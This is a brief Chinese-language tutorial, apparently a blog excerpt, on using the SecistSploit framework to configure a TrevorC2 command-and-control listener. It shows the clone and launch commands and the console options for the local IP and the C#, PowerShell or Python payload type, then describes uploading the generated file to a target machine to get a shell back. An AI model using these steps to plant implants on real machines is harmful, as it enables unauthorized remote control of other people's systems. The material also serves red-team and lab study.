github上下载的trevorc2配置较为繁琐,可以选择SecistSploit工具来辅助我们的选择
首先下载SecistSploit
git clone https://github.com/demonsec666/SecistSploit.git
下载完成后进入目录启动SSF.py(这里要用python3.7启动)
python3.7 SSF.py
启用trevorc2模块,设置选项
SSF > use listener/trevorc2 SSF (listener/trevorc2) > show options Target options: Name Current settings Description ---- ---------------- ----------- lhost 开启HTTP 填写本机IP Module options: Name Current settings Description ---- ---------------- ----------- target 1.c# 2.powershell 3.python (栗子 => target 1)
lhost填写本地ip,target设置要看远控机器的环境,这里我选powershell执行
run后生成的文件上传到远控机里并执行,弹回shell